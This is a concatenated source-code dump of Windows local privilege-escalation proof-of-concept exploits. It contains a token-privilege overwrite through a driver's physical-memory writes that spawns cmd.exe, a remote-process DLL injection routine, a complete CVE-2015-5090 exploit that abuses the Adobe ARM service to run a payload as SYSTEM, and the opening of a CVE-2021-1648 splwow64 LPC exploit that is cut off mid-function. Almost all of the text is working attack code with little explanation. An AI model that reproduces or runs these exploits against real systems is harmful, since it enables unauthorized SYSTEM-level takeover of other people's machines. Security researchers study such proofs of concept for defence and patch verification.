| 290 | SIZE_T uVTokenAddr = GetProcessToken(); 291 | SIZE_T uPTokenAddr = FindTokenAddress(hDriver, uVTokenAddr); 292 | if (uPTokenAddr <= 0x0) 293 | return -1; 294 | 295 | printf("Virtual: %10x\n", uVTokenAddr); 296 | printf("Physical: %10x\n", uPTokenAddr); 297 | printf("Physical offset @ %08x\n", uPTokenAddr + 0x40); 298 | 299 | // perform two 8 byte writes on the enable/default fields of the token 300 | 301 | MEMORY_OP mw; 302 | mw.BufferLength = sizeof(SIZE_T); 303 | mw.DoWrite = 4; 304 | mw.PhysicalAddress = uPTokenAddr + 0x40; // default 305 | memcpy(mw.Payload, &TokenPrivs, sizeof(mw.Payload)); 306 | 307 | WritePhysicalMem(hDriver, mw); 308 | 309 | mw.PhysicalAddress = uPTokenAddr + 0x48; // enabled 310 | WritePhysicalMem(hDriver, mw); 311 | 312 | system("cmd.exe"); 313 | return 0; 314 | } -------------------------------------------------------------------------------- /cve-2018-11072/src/Launcher/Injection.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include "Injection.h" 8 | #include "HCommonEnsureCleanup.h" 9 | 10 | DWORD GetProcessIdByName(const char * name) 11 | { 12 | using namespace Hades; 13 | 14 | PROCESSENTRY32 entry; 15 | entry.dwSize = sizeof(PROCESSENTRY32); 16 | char buf[MAX_PATH]={0}; 17 | size_t charsConverted=0; 18 | 19 | EnsureCloseHandle snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); 20 | 21 | if(Process32First(snapshot, &entry) == TRUE) 22 | { 23 | while(Process32Next(snapshot, &entry) == TRUE) 24 | { 25 | wcstombs_s(&charsConverted, buf, entry.szExeFile, MAX_PATH); 26 | if(_stricmp(buf, name) == 0) 27 | { 28 | return entry.th32ProcessID; 29 | } 30 | } 31 | } 32 | return NULL; 33 | } 34 | 35 | BOOL InjectAndRunThenUnload(DWORD ProcessId, const char * DllName, const std::string& ExportName, const wchar_t * ExportArgument) 36 | { 37 | using namespace Hades; 38 | using namespace std; 39 | 40 | // This doesn't need to be freed 41 | HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll"); 42 | 43 | if(!ProcessId) 44 | { 45 | cout << "Specified Process not found" << endl; 46 | return false; 47 | } 48 | 49 | EnsureCloseHandle Proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId); 50 | 51 | if(!Proc) 52 | { 53 | cout << "Process found, but OpenProcess() failed: " << GetLastError() << endl; 54 | return false; 55 | } 56 | 57 | // LoadLibraryA needs a string as its argument, but it needs to be in 58 | // the remote Process' memory space. 59 | size_t StrLength = strlen(DllName); 60 | LPVOID RemoteString = (LPVOID)VirtualAllocEx(Proc, NULL, StrLength, 61 | MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE); 62 | WriteProcessMemory(Proc, RemoteString, DllName, StrLength, NULL); 63 | 64 | // Start a remote thread on the targeted Process, using LoadLibraryA 65 | // as our entry point to load a custom dll. (The A is for Ansi) 66 | EnsureCloseHandle LoadThread = CreateRemoteThread(Proc, NULL, NULL, 67 | (LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryA"), 68 | RemoteString, NULL, NULL); 69 | WaitForSingleObject(LoadThread, INFINITE); 70 | 71 | // Get the handle of the now loaded module 72 | DWORD hLibModule; 73 | GetExitCodeThread(LoadThread, &hLibModule); 74 | 75 | // Clean up the remote string 76 | VirtualFreeEx(Proc, RemoteString, 0, MEM_RELEASE); 77 | 78 | // Call the function we wanted in the first place 79 | CallExport(ProcessId, DllName, ExportName, ExportArgument); 80 | 81 | // Unload the dll, so we can run again if we choose 82 | EnsureCloseHandle FreeThread = CreateRemoteThread(Proc, NULL, NULL, 83 | (LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "FreeLibrary"), 84 | (LPVOID)hLibModule, NULL, NULL); 85 | WaitForSingleObject(FreeThread, INFINITE); 86 | 87 | return true; 88 | } 89 | 90 | DWORD CallExport(DWORD ProcId, const std::string& ModuleName, const std::string& ExportName, const wchar_t * ExportArgument) 91 | { 92 | using namespace Hades; 93 | using namespace std; 94 | 95 | // Grab a new Snapshot of the process 96 | EnsureCloseHandle Snapshot(CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, ProcId)); 97 | if (Snapshot == INVALID_HANDLE_VALUE) 98 | { 99 | cout << "CallExport: Could not get module Snapshot for remote process." << endl; 100 | return NULL; 101 | } 102 | 103 | // Get the ModuleEntry structure of the desired library 104 | MODULEENTRY32W ModEntry = { sizeof(ModEntry) }; 105 | bool Found = false; 106 | BOOL bMoreMods = Module32FirstW(Snapshot, &ModEntry); 107 | for (; bMoreMods; bMoreMods = Module32NextW(Snapshot, &ModEntry)) 108 | { 109 | wstring ExePath(ModEntry.szExePath); 110 | wstring ModuleTmp(ModuleName.begin(), ModuleName.end()); 111 | // For debug 112 | wcout << ExePath << endl; 113 | Found = (ExePath == ModuleTmp); 114 | if (Found) 115 | break; 116 | } 117 | if (!Found) 118 | { 119 | cout << "CallExport: Could not find module in remote process." << endl; 120 | return NULL; 121 | } 122 | 123 | // Get module base address 124 | PBYTE ModuleBase = ModEntry.modBaseAddr; 125 | 126 | // Get a handle for the target process 127 | EnsureCloseHandle TargetProcess(OpenProcess( 128 | PROCESS_QUERY_INFORMATION | 129 | PROCESS_CREATE_THREAD | 130 | PROCESS_VM_OPERATION | 131 | PROCESS_VM_READ, 132 | FALSE, ProcId)); 133 | if (!TargetProcess) 134 | { 135 | cout << "CallExport: Could not get handle to process." << endl; 136 | return NULL; 137 | } 138 | 139 | // Load module as data so we can read the export address table (EAT) locally. 140 | EnsureFreeLibrary MyModule(LoadLibraryExA(ModuleName.c_str(), NULL, 141 | DONT_RESOLVE_DLL_REFERENCES)); 142 | 143 | // Get module pointer 144 | PVOID Module = static_cast(MyModule); 145 | 146 | // Get pointer to DOS header 147 | PIMAGE_DOS_HEADER pDosHeader = reinterpret_cast( 148 | static_cast(Module)); 149 | if (!pDosHeader || pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) 150 | { 151 | cout << "CallExport: DOS PE header is invalid." << endl; 152 | return NULL; 153 | } 154 | 155 | // Get pointer to NT header 156 | PIMAGE_NT_HEADERS pNtHeader = reinterpret_cast( 157 | reinterpret_cast(Module) + pDosHeader->e_lfanew); 158 | if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) 159 | { 160 | cout << "CallExport: NT PE header is invalid." << endl; 161 | return NULL; 162 | } 163 | 164 | // Get pointer to image export directory 165 | PVOID pExportDirTemp = reinterpret_cast(Module) + 166 | pNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]. 167 | VirtualAddress; 168 | PIMAGE_EXPORT_DIRECTORY pExportDir = 169 | reinterpret_cast(pExportDirTemp); 170 | 171 | // Symbol names could be missing entirely 172 | if (pExportDir->AddressOfNames == NULL) 173 | { 174 | cout << "CallExport: Symbol names missing entirely." << endl; 175 | return NULL; 176 | } 177 | 178 | // Get pointer to export names table, ordinal table, and address table 179 | PDWORD pNamesRvas = reinterpret_cast( 180 | reinterpret_cast(Module) + pExportDir->AddressOfNames); 181 | PWORD pNameOrdinals = reinterpret_cast( 182 | reinterpret_cast(Module) + pExportDir->AddressOfNameOrdinals); 183 | PDWORD pFunctionAddresses = reinterpret_cast( 184 | reinterpret_cast(Module) + pExportDir->AddressOfFunctions); 185 | 186 | // Variable to hold the export address 187 | FARPROC pExportAddr = 0; 188 | 189 | // Walk the array of this module's function names 190 | for (DWORD n = 0; n < pExportDir->NumberOfNames; n++) 191 | { 192 | // Get the function name 193 | PSTR CurrentName = reinterpret_cast( 194 | reinterpret_cast(Module) + pNamesRvas[n]); 195 | 196 | // If not the specified function, try the next one 197 | if (ExportName != CurrentName) continue; 198 | 199 | // We found the specified function 200 | // Get this function's Ordinal value 201 | WORD Ordinal = pNameOrdinals[n]; 202 | 203 | // Get the address of this function's address 204 | pExportAddr = reinterpret_cast(reinterpret_cast(Module) 205 | + pFunctionAddresses[Ordinal]); 206 | 207 | // We got the func. Break out. 208 | break; 209 | } 210 | 211 | // Nothing found, throw exception 212 | if (!pExportAddr) 213 | { 214 | cout << "CallExport: Could not find " << ExportName << "." << endl; 215 | return NULL; 216 | } 217 | 218 | // Convert local address to remote address 219 | PTHREAD_START_ROUTINE pfnThreadRtn = 220 | reinterpret_cast((reinterpret_cast( 221 | pExportAddr) - reinterpret_cast(Module)) + 222 | reinterpret_cast(ModuleBase)); 223 | 224 | // Open the process so we can create the remote string 225 | EnsureCloseHandle Proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcId); 226 | 227 | // Copy the string argument over to the remote process 228 | size_t StrNumBytes = wcslen(ExportArgument) * sizeof(wchar_t); 229 | LPVOID RemoteString = (LPVOID)VirtualAllocEx(Proc, NULL, StrNumBytes, 230 | MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE); 231 | WriteProcessMemory(Proc, RemoteString, ExportArgument, StrNumBytes, NULL); 232 | 233 | // Create a remote thread that calls the desired export 234 | EnsureCloseHandle Thread = CreateRemoteThread(TargetProcess, NULL, NULL, 235 | (LPTHREAD_START_ROUTINE)pfnThreadRtn, RemoteString, NULL, NULL); 236 | if (!Thread) 237 | { 238 | cout << "CallExport: Could not create thread in remote process." << endl; 239 | return NULL; 240 | } 241 | 242 | // Wait for the remote thread to terminate 243 | WaitForSingleObject(Thread, INFINITE); 244 | 245 | // Get thread exit code 246 | DWORD ExitCode = 0; 247 | if (!GetExitCodeThread(Thread, &ExitCode)) 248 | { 249 | cout << "CallExport: Could not get thread exit code." << endl; 250 | return NULL; 251 | } 252 | 253 | // Return thread exit code 254 | return ExitCode; 255 | } 256 | -------------------------------------------------------------------------------- /cve20155090/cve20155090/cve20155090.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | /* 9 | cve-2015-5090 Adobe Reader/Acrobat Pro privesc poc 10 | bryan.alexander@fusionx.com 11 | 12 | Supports Adobe Reader before and including 11.0.10 13 | Tested on Windows 7 x64, should work on x86 as well 14 | */ 15 | 16 | #define BUFSIZE 512 17 | 18 | #define SHARED_MEMORY_SIZE 7800 19 | #define SVC_SM 0x000000AB 20 | #define SVC_ELEVATE 0x000000B4 21 | 22 | std::wstring SVC_NAME = L"AdobeARMservice"; 23 | std::wstring TEMP_DIR = L"C:\\Windows\\Temp\\YdydfsdZd\\"; 24 | std::wstring TEMP_DIRF = L"FOLDER:\"" + TEMP_DIR + L"\""; 25 | std::wstring TEMP_DIR2 = L"C:\\Windows\\Temp\\slksdDSFdf\\"; 26 | std::wstring CLI_USER = std::wstring(487, '\0') + L"/ArmUpdate"; 27 | std::wstring MEM_HANDLE = L"Global\\{E8F34725-3471-4506-B28B-47145817B1AE}_"; 28 | 29 | // fetch PID of given process name 30 | DWORD get_proc(std::wstring process) 31 | { 32 | DWORD pid = -1; 33 | PROCESSENTRY32 entry; 34 | entry.dwSize = sizeof(PROCESSENTRY32); 35 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); 36 | if (Process32First(snapshot, &entry) == TRUE) 37 | { 38 | while (Process32Next(snapshot, &entry) == TRUE) 39 | { 40 | if (wcscmp(entry.szExeFile, process.c_str()) == 0) 41 | { 42 | pid = entry.th32ProcessID; 43 | break; 44 | } 45 | } 46 | } 47 | 48 | return pid; 49 | } 50 | 51 | // fetch and format volume serial number for SM 52 | std::wstring GetVolumeSerialNumber() 53 | { 54 | const WCHAR stand_buffer[] = L"thsnYaViMRAeBoda"; 55 | WCHAR buffer[0x104]; 56 | std::wstring wbuffer = L""; 57 | int radix = 0x0a; 58 | char szVolumeNameBuffer[261]; 59 | DWORD dwVolumeSerialNumber; 60 | 61 | GetVolumeInformationW(_T("C:\\"), // hardcoded by reader 62 | (LPWSTR)szVolumeNameBuffer, 63 | 261, 64 | &dwVolumeSerialNumber, 65 | NULL, NULL, NULL, NULL); 66 | 67 | _itow_s(dwVolumeSerialNumber, buffer, radix); 68 | if (lstrlenW(buffer) < 0x10) 69 | { 70 | // if we're < 16, concat the guid 71 | // GLOBAL\{....}_SERIALNUMBERthsnYaViMRAeBoda 72 | wbuffer += buffer; 73 | wbuffer += stand_buffer; 74 | } 75 | else 76 | wbuffer = std::wstring(buffer); 77 | 78 | return wbuffer; 79 | } 80 | 81 | // trigger armsvc with given service code 82 | BOOL triggerControl(DWORD SVC_CODE) 83 | { 84 | SC_HANDLE scm_handle, service_handle; 85 | SERVICE_STATUS_PROCESS ssp; 86 | 87 | scm_handle = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT | SC_MANAGER_ENUMERATE_SERVICE); 88 | if (scm_handle == NULL) 89 | { 90 | wprintf(L"[-] Could not open SCManager! (%d)\n", GetLastError()); 91 | return FALSE; 92 | } 93 | 94 | service_handle = OpenService(scm_handle, SVC_NAME.c_str(), SERVICE_USER_DEFINED_CONTROL); 95 | if (service_handle == NULL) 96 | { 97 | wprintf(L"[-] Could not get handle to service! (%d)\n", GetLastError()); 98 | CloseServiceHandle(scm_handle); 99 | return FALSE; 100 | } 101 | 102 | // trigger service event 103 | if (!ControlService(service_handle, SVC_CODE, (LPSERVICE_STATUS)&ssp)) 104 | { 105 | wprintf(L"[-] Failed to send control code to service! (%d)\n", GetLastError()); 106 | CloseServiceHandle(service_handle); 107 | CloseServiceHandle(scm_handle); 108 | if (GetLastError() == 1053){ 109 | wprintf(L"[!] Error caught as result of time out, pausing...\n"); 110 | system("PAUSE"); 111 | return TRUE; 112 | } 113 | else 114 | return FALSE; 115 | } 116 | 117 | CloseServiceHandle(service_handle); 118 | CloseServiceHandle(scm_handle); 119 | return TRUE; 120 | } 121 | 122 | // there's some caching issues with armsvc where it wont correctly read from the SM. 123 | // i haven't figured out exactly what it is, but forcing a few more elevation requests 124 | // seems to take care of it. just check the size of our payload vs. the adobe arm and 125 | // return true once we've overwritten it. 126 | BOOL overwritten() 127 | { 128 | // check if we've copied over 129 | DWORD setup_size, curr_size, armpid = -1; 130 | HANDLE hSetup, hCurr; 131 | BOOL result = FALSE; 132 | std::wstring arm_path = L"C:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe"; 133 | 134 | armpid = get_proc(L"AdobeARM.exe"); 135 | if (armpid != -1) 136 | { 137 | // AdobeARM.exe is already running, try to kill it 138 | HANDLE hwd = OpenProcess(PROCESS_TERMINATE, FALSE, armpid); 139 | if (hwd == NULL) 140 | { 141 | wprintf(L"[-] AdobeARM already running, and we can't kill it\n"); 142 | return result; 143 | } 144 | 145 | TerminateProcess(hwd, 0); 146 | CloseHandle(hwd); 147 | } 148 | 149 | 150 | hSetup = CreateFile(L"C:\\Windows\\Temp\\YdydfsdZd\\AdobeARM.exe", 151 | GENERIC_READ, 152 | FILE_SHARE_READ, 153 | NULL, 154 | OPEN_EXISTING, 155 | FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, 156 | NULL); 157 | 158 | // always installed to x86 159 | #if defined(WIN64) 160 | arm_path = L"C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe"; 161 | #endif 162 | BOOL is64 = FALSE; 163 | IsWow64Process(GetCurrentProcess(), &is64); 164 | if (is64) 165 | arm_path = L"C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe"; 166 | 167 | hCurr = CreateFile(arm_path.c_str(), 168 | GENERIC_READ, 169 | FILE_SHARE_READ, 170 | NULL, 171 | OPEN_EXISTING, 172 | FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, 173 | NULL); 174 | 175 | if (!hSetup || !hCurr) 176 | { 177 | // failed to open handles to the files 178 | goto cleanup; 179 | } 180 | 181 | setup_size = GetFileSize(hSetup, NULL); 182 | curr_size = GetFileSize(hCurr, NULL); 183 | if (setup_size == curr_size) 184 | result = TRUE; 185 | 186 | cleanup: 187 | CloseHandle(hSetup); 188 | CloseHandle(hCurr); 189 | return result; 190 | } 191 | 192 | // delete the two temp folders 193 | void cleanup() 194 | { 195 | HANDLE hFile; 196 | WIN32_FIND_DATA fd; 197 | 198 | wprintf(L"[!] Cleaning up...\n"); 199 | 200 | // remove temp dir 2 201 | hFile = FindFirstFileW((TEMP_DIR2 + L"*.*").c_str(), &fd); 202 | if (hFile != INVALID_HANDLE_VALUE) 203 | { 204 | do { 205 | if (!(fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) 206 | DeleteFileW((TEMP_DIR2 + fd.cFileName).c_str()); 207 | } while (FindNextFileW(hFile, &fd)); 208 | FindClose(hFile); 209 | } 210 | 211 | // remove temp dir 1 212 | hFile = FindFirstFileW((TEMP_DIR + L"*.*").c_str(), &fd); 213 | if (hFile != INVALID_HANDLE_VALUE) 214 | { 215 | do { 216 | if (!(fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) 217 | DeleteFileW((TEMP_DIR + fd.cFileName).c_str()); 218 | } while (FindNextFileW(hFile, &fd)); 219 | FindClose(hFile); 220 | } 221 | 222 | RemoveDirectoryW(TEMP_DIR2.c_str()); 223 | RemoveDirectoryW(TEMP_DIR.c_str()); 224 | } 225 | 226 | // we require two folders in tmp, one to point armsvc to, and another for our msi/ini. 227 | // Create the two folders, and write out three files. 228 | BOOL setup() 229 | { 230 | std::map RESOURCE_LIST = { 231 | { L"asdf.ini", 100 }, 232 | { L"asdf.msi", 200 }, 233 | { L"AdobeARM.exe", 300 } 234 | }; 235 | 236 | LPVOID resourcePtr; 237 | BOOL result = TRUE; 238 | HRSRC hResource; 239 | HGLOBAL hResourceData; 240 | HANDLE hFile; 241 | std::wstring path; 242 | DWORD iResourceSize, writtenSize; 243 | char *buf; 244 | 245 | // setup two directories for our AdobeARM.exe and MSI installer 246 | CreateDirectory(L"C:\\Windows\\Temp\\YdydfsdZd\\", NULL); 247 | CreateDirectory(TEMP_DIR2.c_str(), NULL); 248 | 249 | // write out our resources 250 | for (auto const &ent1 : RESOURCE_LIST) 251 | { 252 | hResource = FindResource(GetModuleHandle(NULL), MAKEINTRESOURCE(ent1.second), RT_RCDATA); 253 | if (!hResource) 254 | { 255 | wprintf(L"[-] Could not find resource (%d)\n", ent1.second); 256 | return FALSE; 257 | } 258 | 259 | hResourceData = LoadResource(NULL, hResource); 260 | resourcePtr = LockResource(hResourceData); 261 | iResourceSize = SizeofResource(NULL, hResource); 262 | switch (ent1.second) 263 | { 264 | case 100: 265 | path = TEMP_DIR2 + ent1.first; 266 | break; 267 | case 200: 268 | path = TEMP_DIR2 + ent1.first; 269 | break; 270 | case 300: 271 | path = L"C:\\Windows\\Temp\\YdydfsdZd\\" + ent1.first; 272 | break; 273 | } 274 | 275 | hFile = CreateFile(path.c_str(), 276 | GENERIC_WRITE, 277 | 0, 278 | NULL, 279 | CREATE_NEW, 280 | FILE_ATTRIBUTE_NORMAL, 281 | NULL 282 | ); 283 | 284 | if (hFile == INVALID_HANDLE_VALUE) 285 | { 286 | wprintf(L"[-] Could not create file %s (%d)\n", path, GetLastError()); 287 | result = FALSE; 288 | break; 289 | } 290 | 291 | WriteFile(hFile, resourcePtr, iResourceSize, &writtenSize, NULL); 292 | CloseHandle(hFile); 293 | } 294 | 295 | return result; 296 | } 297 | 298 | int _tmain(int argc, _TCHAR* argv[]) 299 | { 300 | std::wstring SERIAL_NUMBER; 301 | std::wstring command_line; 302 | DWORD armpid = -1, attempts = 0; 303 | HANDLE hMapFile; 304 | LPCTSTR pBuf; 305 | 306 | // create our empty copy directory 307 | wprintf(L"[!] Setting up temp directories and dropping files...\n"); 308 | if(!setup()) 309 | return -1; 310 | 311 | // grab PID of armsvc, or exit if not running 312 | wprintf(L"[!] Checking for armsvc...\n"); 313 | armpid = get_proc(L"armsvc.exe"); 314 | if (armpid == -1) 315 | { 316 | wprintf(L"[-] armsvc not found!\n"); 317 | return -1; 318 | } 319 | 320 | // got PID and dirs created, trigger SM creation 321 | wprintf(L"[!] armsvc found (PID %d), triggering SharedMemory create...\n", armpid); 322 | if (!triggerControl(SVC_SM)) 323 | { 324 | wprintf(L"[-] Exiting...\n"); 325 | return -1; 326 | } 327 | 328 | // SM should be created, try getting a handle. 329 | // the generated SM should be MEM_HANDLE followed by the 330 | // concatenation of the root drive serial no and a hard coded string 331 | wprintf(L"[!] Grabbing SharedMemory handle...\n"); 332 | SERIAL_NUMBER = GetVolumeSerialNumber(); 333 | MEM_HANDLE.append(SERIAL_NUMBER); 334 | wprintf(L"[!] %s\n", MEM_HANDLE.c_str()); 335 | 336 | hMapFile = OpenFileMapping(FILE_MAP_READ | FILE_MAP_WRITE, FALSE, MEM_HANDLE.c_str()); 337 | if (hMapFile == NULL) 338 | { 339 | wprintf(L"[-] Could not open handle to memory! (%d)\n", GetLastError()); 340 | return -1; 341 | } 342 | 343 | pBuf = (LPTSTR)MapViewOfFile(hMapFile, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, SHARED_MEMORY_SIZE); 344 | if (pBuf == NULL) 345 | { 346 | wprintf(L"[-] Could not map view of file! (%d)\n", GetLastError()); 347 | goto clean; 348 | } 349 | 350 | wprintf(L"[!] Shared memory mapped @ %08x\n", pBuf); 351 | wprintf(L"[!] Writing args to shared memory...\n"); 352 | 353 | while (!overwritten() && attempts < 5) 354 | { 355 | memset((void*)pBuf, 0x00, SHARED_MEMORY_SIZE); 356 | 357 | command_line = TEMP_DIRF + CLI_USER; 358 | memcpy_s((void*)pBuf, SHARED_MEMORY_SIZE, command_line.c_str(), (command_line.size() * sizeof(wchar_t))); 359 | 360 | // trigger elevate to copy over setup.exe 361 | wprintf(L"[!] Triggering overwrite...\n"); 362 | if (!triggerControl(SVC_ELEVATE)) 363 | { 364 | wprintf(L"[-] Exiting...\n"); 365 | goto clean; 366 | } 367 | 368 | Sleep(5000); 369 | attempts++; 370 | } 371 | 372 | if (attempts == 5) 373 | { 374 | wprintf(L"[-] Could not trigger overwrite; perhaps this isn't a vulnerable version?\n"); 375 | goto clean; 376 | } 377 | 378 | // AdobeARM.exe overwritten, wipe SM and write in our arguments for setup.exe 379 | CLI_USER = std::wstring(487, '\0') + L"SYSTEM"; 380 | command_line = TEMP_DIRF + CLI_USER + std::wstring(L" /sAll /ini \"C:\\Windows\\Temp\\slksdDSFdf\\asdf.ini\""); 381 | memset((void*)pBuf, 0x00, SHARED_MEMORY_SIZE); 382 | memcpy_s((void*)pBuf, SHARED_MEMORY_SIZE, command_line.c_str(), (command_line.size() * sizeof(wchar_t))); 383 | 384 | // retrigger SVC_ELEVATE 385 | wprintf(L"[!] Retriggering for shell...\n"); 386 | if (!triggerControl(SVC_ELEVATE)) 387 | { 388 | wprintf(L"[-] Exiting...\n"); 389 | goto clean; 390 | } 391 | 392 | goto clean; 393 | 394 | clean: 395 | UnmapViewOfFile(pBuf); 396 | CloseHandle(hMapFile); 397 | cleanup(); 398 | return 0; 399 | } 400 | 401 | -------------------------------------------------------------------------------- /cve20211648/splpoc/splpoc.cpp: -------------------------------------------------------------------------------- 1 | #include ; 2 | #include "windows.h"; 3 | #include "Shlwapi.h"; 4 | #include "winternl.h"; 5 | 6 | #pragma comment(lib, "ntdll.lib") 7 | #pragma comment(lib, "shlwapi.lib") 8 | 9 | typedef struct _PORT_VIEW 10 | { 11 | UINT64 Length; 12 | HANDLE SectionHandle; 13 | UINT64 SectionOffset; 14 | UINT64 ViewSize; 15 | UCHAR* ViewBase; 16 | UCHAR* ViewRemoteBase; 17 | } PORT_VIEW, * PPORT_VIEW; 18 | 19 | typedef struct _PORT_MESSAGE_HEADER { 20 | USHORT DataSize; 21 | USHORT MessageSize; 22 | USHORT MessageType; 23 | USHORT VirtualRangesOffset; 24 | CLIENT_ID ClientId; 25 | UINT64 MessageId; 26 | UINT64 SectionSize; 27 | } PORT_MESSAGE_HEADER, * PPORT_MESSAGE_HEADER; 28 | 29 | typedef struct _PORT_MESSAGE { 30 | PORT_MESSAGE_HEADER MessageHeader; 31 | UINT64 MsgSendLen; 32 | UINT64 PtrMsgSend; 33 | UINT64 MsgReplyLen; 34 | UINT64 PtrMsgReply; 35 | UCHAR Unk4[0x1F8]; 36 | } PORT_MESSAGE, * PPORT_MESSAGE; 37 | 38 | typedef struct _MView { 39 | PORT_VIEW ClientView; 40 | PORT_MESSAGE LpcRequest; 41 | PORT_MESSAGE LpcReply; 42 | UINT64 Cookie; 43 | HANDLE hPortHandle; 44 | UINT64 MsgSize; 45 | } MView, *PMView; 46 | 47 | NTSTATUS(NTAPI* NtOpenProcessToken)( 48 | _In_ HANDLE ProcessHandle, 49 | _In_ ACCESS_MASK DesiredAccess, 50 | _Out_ PHANDLE TokenHandle 51 | ); 52 | 53 | NTSTATUS(NTAPI* ZwQueryInformationToken)( 54 | _In_ HANDLE TokenHandle, 55 | _In_ TOKEN_INFORMATION_CLASS TokenInformationClass, 56 | _Out_writes_bytes_to_opt_(TokenInformationLength, *ReturnLength) PVOID TokenInformation, 57 | _In_ ULONG TokenInformationLength, 58 | _Out_ PULONG ReturnLength 59 | ); 60 | 61 | NTSTATUS(NTAPI* NtCreateSection)( 62 | PHANDLE SectionHandle, 63 | ACCESS_MASK DesiredAccess, 64 | POBJECT_ATTRIBUTES ObjectAttributes, 65 | PLARGE_INTEGER MaximumSize, 66 | ULONG SectionPageProtection, 67 | ULONG AllocationAttributes, 68 | HANDLE FileHandle 69 | ); 70 | 71 | NTSTATUS(NTAPI* ZwSecureConnectPort)( 72 | _Out_ PHANDLE PortHandle, 73 | _In_ PUNICODE_STRING PortName, 74 | _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos, 75 | _Inout_opt_ PPORT_VIEW ClientView, 76 | _In_opt_ PSID Sid, 77 | _Inout_opt_ PVOID ServerView, 78 | _Out_opt_ PULONG MaxMessageLength, 79 | _Inout_opt_ PVOID ConnectionInformation, 80 | _Inout_opt_ PULONG ConnectionInformationLength 81 | ); 82 | 83 | NTSTATUS(NTAPI* NtRequestWaitReplyPort)( 84 | IN HANDLE PortHandle, 85 | IN PPORT_MESSAGE LpcRequest, 86 | OUT PPORT_MESSAGE LpcReply 87 | ); 88 | 89 | PVOID Prepare0x6DMessage(PMView, UINT64); 90 | PVOID Prepare0x6DMessage(PMView, UINT64, UINT64, UINT64); 91 | 92 | int Init() 93 | { 94 | HMODULE ntdll = GetModuleHandleA("ntdll"); 95 | 96 | printf("ntdll = 0x%llX\n", ntdll); 97 | 98 | NtOpenProcessToken = (NTSTATUS(NTAPI*) (HANDLE, ACCESS_MASK, PHANDLE)) GetProcAddress(ntdll, "NtOpenProcessToken"); 99 | if (NtOpenProcessToken == NULL) 100 | { 101 | printf("Failed to get NtOpenProcessToken\n"); 102 | return 0; 103 | } 104 | 105 | ZwQueryInformationToken = (NTSTATUS(NTAPI*) (HANDLE, TOKEN_INFORMATION_CLASS, PVOID, ULONG, PULONG)) GetProcAddress(ntdll, "ZwQueryInformationToken"); 106 | if (ZwQueryInformationToken == NULL) 107 | { 108 | printf("Failed to get ZwQueryInformationToken\n"); 109 | return 0; 110 | } 111 | 112 | NtCreateSection = (NTSTATUS(NTAPI*) (PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PLARGE_INTEGER, ULONG, ULONG, HANDLE)) GetProcAddress(ntdll, "NtCreateSection"); 113 | if (NtCreateSection == NULL) 114 | { 115 | printf("Failed to get NtCreateSection\n"); 116 | return 0; 117 | } 118 | 119 | ZwSecureConnectPort = (NTSTATUS(NTAPI*) (PHANDLE, PUNICODE_STRING, PSECURITY_QUALITY_OF_SERVICE, PPORT_VIEW, PSID, PVOID, PULONG, PVOID, PULONG)) GetProcAddress(ntdll, "ZwSecureConnectPort"); 120 | if (ZwSecureConnectPort == NULL) 121 | { 122 | printf("Failed to get ZwSecureConnectPort\n"); 123 | return 0; 124 | } 125 | 126 | NtRequestWaitReplyPort = (NTSTATUS(NTAPI*) (HANDLE, PPORT_MESSAGE, PPORT_MESSAGE)) GetProcAddress(ntdll, "NtRequestWaitReplyPort"); 127 | if (NtRequestWaitReplyPort == NULL) 128 | { 129 | printf("Failed to get NtRequestWaitReplyPort\n"); 130 | return 0; 131 | } 132 | 133 | return 1; 134 | } 135 | 136 | int GetPortName(PUNICODE_STRING DestinationString) 137 | { 138 | void* tokenHandle; 139 | DWORD sessionId; 140 | ULONG length; 141 | 142 | int tokenInformation[16]; 143 | WCHAR dst[256]; 144 | 145 | memset(tokenInformation, 0, sizeof(tokenInformation)); 146 | ProcessIdToSessionId(GetCurrentProcessId(), &sessionId); 147 | 148 | memset(dst, 0, sizeof(dst)); 149 | 150 | if (NtOpenProcessToken(GetCurrentProcess(), 0x20008u, &tokenHandle) 151 | || ZwQueryInformationToken(tokenHandle, TokenStatistics, tokenInformation, 0x38u, &length)) 152 | { 153 | return 0; 154 | } 155 | 156 | wsprintfW( 157 | dst, 158 | L"\\RPC Control\\UmpdProxy_%x_%x_%x_%x", 159 | sessionId, 160 | tokenInformation[2], 161 | tokenInformation[3], 162 | 0x2000); 163 | printf("name: %ls\n", dst); 164 | RtlInitUnicodeString(DestinationString, dst); 165 | 166 | return 1; 167 | } 168 | 169 | HANDLE CreatePortSharedBuffer(PPORT_VIEW ClientView, PUNICODE_STRING PortName) 170 | { 171 | HANDLE sectionHandle = 0; 172 | HANDLE portHandle = 0; 173 | union _LARGE_INTEGER maximumSize; 174 | maximumSize.QuadPart = 0x20000; 175 | 176 | if (0 != NtCreateSection(§ionHandle, SECTION_MAP_WRITE | SECTION_MAP_READ, 0, &maximumSize, PAGE_READWRITE, SEC_COMMIT, NULL)) { 177 